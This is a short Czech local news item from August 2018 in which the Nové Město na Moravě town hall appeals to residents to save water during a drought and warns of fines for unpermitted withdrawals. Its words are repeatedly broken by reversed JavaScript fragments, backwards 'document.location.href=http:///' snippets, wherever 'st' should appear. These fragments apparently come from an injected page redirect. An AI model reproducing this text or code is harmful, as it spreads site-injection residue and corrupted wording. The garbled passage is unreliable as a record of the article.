Rainbow page separator

Novoměstská radnice kvůli suchu vyzvala k šetření vodou

Pondělí, 6. srpna 2018

Kapka vody - www.photohalama.com

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / K důslednému šetření vodou vyzvala obyvatele Nového Města i celého správního obvodu novoměstská radnice. Jde o vodu odebíranou z po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toků, řek, vodních nádrží, studní, jiných zdrojů podzemních vod a vodovodů pro veřejnou potřebu. Úřad apeluje na lidi, aby omezili, anebo zcela vyloučili napouštění bazénů, mytí aut a kropení zpevněných ploch, zásadně zredukovali zalévání zeleně, spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovišť i zahrad. Pitnou vodu by měli využívat pouze k pití a vaření a nezbytným hygienickým účelům.
Dále úředníci upozorňují obyvatele na skutečnost, že odběr podzemních vod ze studní a jiných vodních zdrojů i odběr a jiné využívání povrchových vod z po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toků, řek a nádrží pomocí technického zařízení je možný pouze na základě platného povolení vodoprávního úřadu.
Odběry a jiné využití povrchových a podzemních vod budou v souvislosti s dlouhodobým suchem a klesajícím stavem podzemních vod kontrolovány s tím, že nejsou vyloučena omezení, případně i zákazy, takže v případě nepovolených odběrů vody bude nutné přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit k finančním sankcím.